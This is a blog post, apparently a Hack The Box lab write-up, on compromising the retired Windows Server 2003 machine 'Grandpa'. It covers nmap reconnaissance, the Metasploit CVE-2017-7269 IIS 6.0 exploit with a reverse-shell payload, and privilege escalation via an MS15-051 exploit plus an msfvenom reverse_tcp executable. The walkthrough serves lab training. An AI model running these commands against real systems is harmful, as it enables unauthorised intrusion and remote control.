{"id":177,"date":"2024-11-13T10:52:48","date_gmt":"2024-11-13T02:52:48","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=177"},"modified":"2024-11-13T10:52:48","modified_gmt":"2024-11-13T02:52:48","slug":"177","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/177\/","title":{"rendered":"HTB Machine Grandpa Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code>10.10.10.14<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>Information gathering<\/h1>\n<h2>ICMP check<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.14 (10.10.10.14) 56(84) bytes of data.\n64 bytes from 10.10.10.14: icmp_seq=1 ttl=127 time=98.8 ms\n64 bytes from 10.10.10.14: icmp_seq=2 ttl=127 time=99.3 ms\n64 bytes from 10.10.10.14: icmp_seq=3 ttl=127 time=99.5 ms\n64 bytes from 10.10.10.14: icmp_seq=4 ttl=127 time=99.9 ms\n\n--- 10.10.10.14 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3302ms\nrtt min\/avg\/max\/mdev = 98.848\/99.371\/99.859\/0.360 ms<\/code><\/pre>\n<p>Network connectivity between the attacking machine and the target is normal.<\/p>\n<h2>Firewall check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 06:59:17 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_report.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.10s latency).\nNot shown: 65534 filtered tcp ports (no-response)\nPORT   STATE      SERVICE\n80\/tcp unfiltered http\n\n# Nmap done at Sun Oct  6 07:00:22 2024 -- 1 IP address (1 host up) scanned in 65.86 seconds<\/code><\/pre>\n<p>The target exposes <code>1<\/code> <code>TCP<\/code> port.<\/p>\n<h2>Network port scan<\/h2>\n<p><code>TCP<\/code> <strong>port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 07:06:40 2024 as: nmap -sS -sV -A -p 80 -oN .\/tcp_report.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.092s latency).\n\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    Microsoft IIS httpd 6.0\n|_http-server-header: Microsoft-IIS\/6.0\n|_http-title: Under Construction\n| http-webdav-scan: \n|   WebDAV type: Unknown\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\n|   Server Date: Sat, 05 Oct 2024 22:55:30 GMT\n|   Server Type: Microsoft-IIS\/6.0\n|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\n| http-methods: \n|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (90%)\nOS CPE: cpe:\/o:microsoft:windows_server_2003::sp1 cpe:\/o:microsoft:windows_server_2003::sp2 cpe:\/o:microsoft:windows_server_2008::sp2 cpe:\/o:microsoft:windows_xp::sp3 cpe:\/o:microsoft:windows_2000::sp4\nAggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (90%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows XP SP3 (88%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (88%), Microsoft Windows XP SP2 or SP3 (86%), Microsoft Windows XP (85%), Microsoft Windows Server 2003 (85%), Microsoft Windows XP SP2 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   92.67 ms 10.10.14.1\n2   92.63 ms 10.10.10.14\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Oct  6 07:06:57 2024 -- 1 IP address (1 host up) scanned in 16.69 seconds<\/code><\/pre>\n<p><code>UDP<\/code> <strong>open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Sun Oct  6 07:08:42 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.14\nNmap scan report for 10.10.10.14\nHost is up (0.093s latency).\nAll 65535 scanned ports on 10.10.10.14 are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Sun Oct  6 07:09:48 2024 -- 1 IP address (1 host up) scanned in 66.48 seconds<\/code><\/pre>\n<p><code>UDP<\/code> <strong>port detail scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target OS is most likely <code>Windows Server 2003<\/code>, and that it exposes an <code>IIS 6.0<\/code> server with <code>WebDAV<\/code> enabled, which allows a large number of risky <code>HTTP<\/code> methods.<\/p>\n<hr \/>\n<h1>Web service probing<\/h1>\n<p>Open the home page: <code>http:\/\/grandpa.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728170726076-f22cd2a2-fcc1-43fa-8ca0-2bfc59ed73e4.png\" alt=\"\" \/><\/p>\n<p>It is the <code>IIS<\/code> server's default <code>304<\/code> page. Capture the request and replay it to inspect the traffic details:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728170858118-b6b83eb9-314c-4e67-a06b-056703f69cd7.png\" alt=\"\" \/><\/p>\n<p>The following <code>HTTP<\/code> response header is present:<\/p>\n<pre><code class=\"language-plain\">X-Powered-By: ASP.NET<\/code><\/pre>\n<p>This indicates that the server can process <code>ASP.NET<\/code>.<\/p>\n<p>A vulnerability database lookup also shows that <code>IIS 6.0<\/code> has a remote buffer overflow vulnerability, <code>CVE-2017-7269<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173433710-642eac6c-1947-4f59-ac9b-dcc6716e22b8.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>Penetration testing<\/h1>\n<h2>Exploiting the IIS 6.0 buffer overflow<\/h2>\n<p>Start <code>Metasploit<\/code> and search for an exploit module by <code>CVE<\/code> ID:<\/p>\n<pre><code class=\"language-plain\">search CVE-2017-7269<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173580388-e6c9a575-c8bc-4009-848b-b40bd0e0f6eb.png\" alt=\"\" \/><\/p>\n<p>The exploit module is found; run the following commands to set the module's parameters:<\/p>\n<pre><code class=\"language-shell\">use 0\nset payload payload\/windows\/shell\/reverse_tcp\nset RHOSTS 10.10.10.14\nset LHOST 10.10.14.5\nset LPORT 443<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728173932171-f118f646-9029-40da-a29c-83424b07d1da.png\" alt=\"\" \/><\/p>\n<p>Then launch the exploit with the <code>run<\/code> command:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728174049530-a71e1c02-b7a5-4c3c-a104-2eac2d086625.png\" alt=\"\" \/><\/p>\n<p><strong>Exploit successful!!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege escalation<\/h1>\n<h2>Kernel vulnerability lookup<\/h2>\n<p>Run the following command to save detailed system information to a file:<\/p>\n<pre><code class=\"language-shell\">systeminfo &gt; .\\\\sysinfo.txt<\/code><\/pre>\n<p>Then use <code>Windows Exploit Suggester 2<\/code> to look up system vulnerabilities:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728174946507-bf6fec99-5aec-4287-a60d-1361c2d8725b.png\" alt=\"\" \/><\/p>\n<p>We decide to escalate privileges via <code>MS15-051<\/code>.<\/p>\n<h2>Exploiting MS15-051<\/h2>\n<p>Download the exploit (<code>EXP<\/code>) program for <code>MS15-051<\/code> from <code>GitHub<\/code>: <a href=\"https:\/\/raw.githubusercontent.com\/SecWiki\/windows-kernel-exploits\/refs\/heads\/master\/MS15-051\/ms15-051.zip\" target=\"_blank\" rel=\"nofollow\">windows-kernel-exploits\/MS15-051 at master \u00b7 SecWiki\/windows-kernel-exploits \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728177726920-4547e1fd-c42c-4c55-8f7e-2ed1ee16eaf0.png\" alt=\"\" \/><\/p>\n<p>Before using this program, first obtain a <code>Meterpreter<\/code> session, then use the <code>migrate<\/code> command to migrate the current process into a stable process:<\/p>\n<pre><code class=\"language-shell\">migrate 2304<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728177870173-6413f886-71b8-45e5-ade8-7112fcc761a6.png\" alt=\"\" \/><\/p>\n<p>We are now migrated into the <code>davcdata.exe<\/code> process.<\/p>\n<p>Then use <code>upload<\/code> to upload the <code>EXP<\/code> program:<\/p>\n<pre><code class=\"language-shell\">upload .\/ms15-051.exe<\/code><\/pre>\n<p>Next, try running the <code>whoami<\/code> command through it:<\/p>\n<pre><code class=\"language-shell\">.\\\\ms15-051.exe \"whoami\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728178149433-709b2b72-d844-4fe0-82ee-e2c0c8259b91.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation with this program succeeded!!!!<\/strong><\/p>\n<p>Now upload a reverse shell program and execute it through the exploit program (a new <code>MSF<\/code> listener needs to be started):<\/p>\n<pre><code class=\"language-shell\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o reverse.exe\nupload .\/reverse.exe\nshell\n.\\\\ms15-051.exe \".\\\\reverse.exe\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728180075254-7beaa9a2-bec5-434e-98c8-835495f36bcd.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>Flag files<\/h1>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1728180278734-556e3044-42e1-4c4f-b315-32536d8e946a.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>This machine's penetration test ends here<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target information IP address: 10.10.10.14 Information gathering ICMP check PING 10.10.10.14 (10.10.10.14)  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13,1],"tags":[],"class_list":["post-177","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=177"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177\/revisions"}],"predecessor-version":[{"id":178,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/177\/revisions\/178"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=177"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=177"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=177"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}